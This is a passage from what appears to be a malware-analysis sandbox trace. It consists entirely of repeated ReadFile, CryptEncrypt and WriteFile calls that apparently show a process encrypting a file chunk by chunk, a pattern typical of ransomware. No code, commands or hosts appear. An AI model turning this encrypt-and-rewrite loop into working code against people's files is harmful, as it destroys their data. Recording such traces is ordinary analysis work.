nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.650] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.650] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.650] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.650] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.650] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.650] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.650] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.650] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.650] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.651] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.651] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.651] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.651] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.651] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.651] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.651] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.651] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.651] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.651] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.651] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.651] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.651] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.651] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.652] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.652] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.652] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.652] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.652] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.652] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.652] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.652] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.652] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.652] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.652] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.652] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.652] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.652] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.653] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.653] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.653] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.653] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.653] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.653] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.653] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.653] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.653] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.653] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.653] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.653] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.653] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.653] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.653] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.654] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.654] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.654] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.654] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.654] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.654] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.654] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.654] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.654] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.654] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.654] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.654] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.654] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.654] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.655] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.655] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.655] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.655] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.655] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.655] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.655] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.655] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.655] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.655] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.655] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.655] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.655] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.656] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.656] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.656] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.656] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.656] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.656] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.656] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.656] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.656] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.657] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.657] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.657] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.657] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.657] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.657] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.657] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.657] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.657] ReadFile (in: hFile=0x5d4c, 